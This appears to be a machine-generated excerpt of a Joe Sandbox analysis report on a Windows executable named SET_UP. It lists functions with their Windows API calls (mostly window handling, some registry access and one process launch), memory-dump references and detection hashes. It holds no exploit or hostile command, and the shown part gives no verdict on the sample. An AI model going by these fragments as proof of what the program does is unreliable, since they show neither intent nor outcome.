                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEnumH_prologOpenQueryValue
                                                                                                                                                                                                  • String ID: Software\
                                                                                                                                                                                                  • API String ID: 2161548231-964853688
                                                                                                                                                                                                  • Opcode ID: e5dcabf1e9d3071f94a221207040d20d9d93d85e64f69735385035064c7d9702
                                                                                                                                                                                                  • Instruction ID: b9ed26cb46934d40732653e6896770cf18755b1c766b413f6634250aa2fb02d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5dcabf1e9d3071f94a221207040d20d9d93d85e64f69735385035064c7d9702
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04314F7590021AAEDF11EBA1CC95EFEBB79FF04314F50056EF511E2190DB78AA44CBA4
                                                                                                                                                                                                  Function 00414CEB Relevance: 10.6, APIs: 7, Instructions: 89windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCapture.USER32 ref: 00414CF5
                                                                                                                                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00414D65
                                                                                                                                                                                                  • InvalidateRect.USER32(00000000,00000000,00000000), ref: 00414D72
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00414D8C
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000115,?,00000000), ref: 00414DB1
                                                                                                                                                                                                  • UpdateWindow.USER32(?), ref: 00414DBA
                                                                                                                                                                                                  • _TrackMouseEvent.COMCTL32(00000010,00000000,00000001), ref: 00414E00
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$CaptureEventInvalidateMessageMouseOffsetParentPostTrackUpdateWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 28226273-0
                                                                                                                                                                                                  • Opcode ID: c883d2d7f6609ceea994781507db43070c004bf1c2ba0bf192db29ef8040aa75
                                                                                                                                                                                                  • Instruction ID: a0963d5c2e0f88895a4295760a70e05907c7cf04393ba3b51c0a4cb6bcb638a1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c883d2d7f6609ceea994781507db43070c004bf1c2ba0bf192db29ef8040aa75
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC31AE71200700DBDB249F75DD08FEABBA5AF84304F10482EF95AC7290DB78A841CB58
                                                                                                                                                                                                  Function 004B43E6 Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetParent.USER32(0040DFDC), ref: 004B43F3
                                                                                                                                                                                                  • GetWindowRect.USER32(0040DFDC,0040DFDC), ref: 004B440D
                                                                                                                                                                                                  • ScreenToClient.USER32(0040DFDC,0040DFDC), ref: 004B4420
                                                                                                                                                                                                  • ScreenToClient.USER32(0040DFDC,?), ref: 004B4429
                                                                                                                                                                                                  • EqualRect.USER32(0040DFDC,0040DFDC), ref: 004B4433
                                                                                                                                                                                                  • DeferWindowPos.USER32(?,0040DFDC,00000000,?,C3C95B5E,24748B56,CE8B5708,00000014), ref: 004B445B
                                                                                                                                                                                                  • SetWindowPos.USER32(0040DFDC,00000000,?,C3C95B5E,24748B56,CE8B5708,00000014,?,75C04A40,0040DFDC,0040DFDC,?,?), ref: 004B4473
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 443303494-0
                                                                                                                                                                                                  • Opcode ID: cf44b72f48d6369d305cfc0046c4ebbd92cae56da8398977a49c21bed73f74d9
                                                                                                                                                                                                  • Instruction ID: c6f597895c3f52a46666eff5535548c03a0c0c0a4288fa53688e6089e96e037d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf44b72f48d6369d305cfc0046c4ebbd92cae56da8398977a49c21bed73f74d9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B1151B6600209BFE7108F69DC48EBBBBBDEB88710F10852AB95593255E734ED11CB74
                                                                                                                                                                                                  Function 004AD460 Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindowRect.USER32(?), ref: 004AD470
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AD479
                                                                                                                                                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 004AD4D8
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004AD4DF
                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 004AD4F3
                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 004AD4FB
                                                                                                                                                                                                  • InvalidateRect.USER32(00000000,?,00000000), ref: 004AD511
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1809568455-0
                                                                                                                                                                                                  • Opcode ID: 463c9d304fe6eb307660a83f50751158f203e2dfe346b0102b753ef653a226fc
                                                                                                                                                                                                  • Instruction ID: 50ffc4d00ec097472926aa58dcd9e190b62d966b809761b4bfc8d12d6b38ca57
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 463c9d304fe6eb307660a83f50751158f203e2dfe346b0102b753ef653a226fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D218E31A04305AFE714DF64C894F7B73A9EBA9724F40091EF65683291D738EC05CB26
                                                                                                                                                                                                  Function 00495C5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,00000000,00000000), ref: 00495C9B
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 00495CB3
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 00495CBA
                                                                                                                                                                                                  • lstrcpyW.KERNEL32(-00000028,DISPLAY,00000028), ref: 00495CDE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: System$Metrics$InfoParameterslstrcpy
                                                                                                                                                                                                  • String ID: B$DISPLAY
                                                                                                                                                                                                  • API String ID: 1409579217-3316187204
                                                                                                                                                                                                  • Opcode ID: 85bb01ca52ba363b3fa9cf2df10da74d41e311567bf4d1deebc7344da43dbf4f
                                                                                                                                                                                                  • Instruction ID: 4760cfc774b0bca99e4c628b8fdc58c149daabb94a209b953cd605f1a26a71bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85bb01ca52ba363b3fa9cf2df10da74d41e311567bf4d1deebc7344da43dbf4f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43110231600720ABCF129F65DC88A8BBFA8FF09711B204033FC04AE142D7B9D804CBA8
                                                                                                                                                                                                  Function 0040C681 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000424), ref: 0040C6A9
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C6C6
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040C6D8
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 0040C700
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$ClientMetricsRectSystem
                                                                                                                                                                                                  • String ID: Extension$Name
                                                                                                                                                                                                  • API String ID: 3399072733-2670291654
                                                                                                                                                                                                  • Opcode ID: ae6f751ecd212605465e6f322b06151e8a662c8b06f0b6fc0bc4688ddc671d39
                                                                                                                                                                                                  • Instruction ID: 5516346071384951d1090e1d5791696de537388447c7decd2c6349fd9b5c3c75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae6f751ecd212605465e6f322b06151e8a662c8b06f0b6fc0bc4688ddc671d39
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF11C8313403447BEA307B799D46FAF7669EB80B14F10063DF652AB1D1CAB5A8048728
                                                                                                                                                                                                  Function 0040D4BF Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 56COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040D4C4
                                                                                                                                                                                                    • Part of subcall function 004BC38F: RegDeleteKeyW.ADVAPI32(00000000,?), ref: 004BC3B3
                                                                                                                                                                                                    • Part of subcall function 004BC38F: RegCloseKey.ADVAPI32(00000000), ref: 004BC408
                                                                                                                                                                                                    • Part of subcall function 004BC31A: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,00000001,?,?,0042AF28,Settings,LastLicenseCheck,?,?,?), ref: 004BC346
                                                                                                                                                                                                    • Part of subcall function 004BC31A: RegCloseKey.ADVAPI32(00000000,?,0042AF28,Settings,LastLicenseCheck,?,?,?), ref: 004BC34F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Close$DeleteH_prologValue
                                                                                                                                                                                                  • String ID: %s\%s$Data\File Types$Extension$Icon$Name
                                                                                                                                                                                                  • API String ID: 1215613159-1963114798
                                                                                                                                                                                                  • Opcode ID: 5656b2352a46bdfb2d43a6cfb516010bf3b6c067c8215d270e15ee12db318f5b
                                                                                                                                                                                                  • Instruction ID: fba1d6a314cef348a0d2546c7ce32fe115823ad611b91b4f624b73ed7c200e22
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5656b2352a46bdfb2d43a6cfb516010bf3b6c067c8215d270e15ee12db318f5b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E118235A00204ABCF10DF96CC81EAEBBB1FF48764F50C52EF919A7291C739A914CB58
                                                                                                                                                                                                  Function 004AD520 Relevance: 10.5, APIs: 7, Instructions: 42COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AD52D
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004AD53B
                                                                                                                                                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 004AD54A
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004AD551
                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 004AD565
                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 004AD56D
                                                                                                                                                                                                  • ValidateRect.USER32(00000000,?), ref: 004AD581
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$ClientScreenWindow$InflateLongParentValidate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2275295265-0
                                                                                                                                                                                                  • Opcode ID: 47c81642d7a96463b12b34264baaaf0e5a9709322d72d894c312ec504b2f9cea
                                                                                                                                                                                                  • Instruction ID: cdedafeb9cba1b8c08a18d6e1f0627bdf1464ef517b4a7ad831a88982853e5ac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47c81642d7a96463b12b34264baaaf0e5a9709322d72d894c312ec504b2f9cea
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77F0AF76610202BFD3419B55DCC8EBF77BCEBD9724F40492AFA1992290D73498068B7B
                                                                                                                                                                                                  Function 004C05EC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25registrywindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Version$MessageRegisterWindow
                                                                                                                                                                                                  • String ID: MSWHEEL_ROLLMSG
                                                                                                                                                                                                  • API String ID: 303823969-2485103130
                                                                                                                                                                                                  • Opcode ID: 7679aa96abb64beffaacab62027cdaf2503edbc6f5fb609b5f01762e7fbb8855
                                                                                                                                                                                                  • Instruction ID: 8990738a53c23fc06bd50b624f1a4dcbef408eab377974a00eaf5b13ded63f4f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7679aa96abb64beffaacab62027cdaf2503edbc6f5fb609b5f01762e7fbb8855
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E048BE950217D6D6912B64AC44F7A26945BD87A4F51403FD900832549A6C08539FAF
                                                                                                                                                                                                  Function 0041C253 Relevance: 9.1, APIs: 6, Instructions: 121synchronizationprocessCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000230,00000000,00000000,?,?), ref: 0041C2D7
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 0041C2F5
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041C335
                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0041C348
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0041C356
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0041C364
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandleObjectProcessSingleWait$CodeCreateExit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4198832346-0
                                                                                                                                                                                                  • Opcode ID: 08b69aa10bb556e8869df28e7a384f4b88b89f9d5f9a84f0440de7a8e817cef6
                                                                                                                                                                                                  • Instruction ID: 89abd7f9de1a646779240ee680c9cae02997802c9b3a7940540ae61844de7f7c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b69aa10bb556e8869df28e7a384f4b88b89f9d5f9a84f0440de7a8e817cef6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1416270540209EFCB218FA5DCC4DEF7BB4FF41754F14862AF92196290C7799984CB69
                                                                                                                                                                                                  Function 00495768 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __aulldiv__aullrem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3839614884-0
                                                                                                                                                                                                  • Opcode ID: 4bc2be86f55033f30a126aad25af9f2db4e96640e493f3b6851394c0c132f75f
                                                                                                                                                                                                  • Instruction ID: b33e5daed0ea927ced96e99162dffba0d0b2e8c3e0eaed78718e9b995b634fcb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bc2be86f55033f30a126aad25af9f2db4e96640e493f3b6851394c0c132f75f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9531E471600349ABCF12AF598C809AF7F69FF91354F24047FF94197241D6749A2287AA
                                                                                                                                                                                                  Function 00481450 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004811D0: lstrlenA.KERNEL32(?), ref: 004811F6
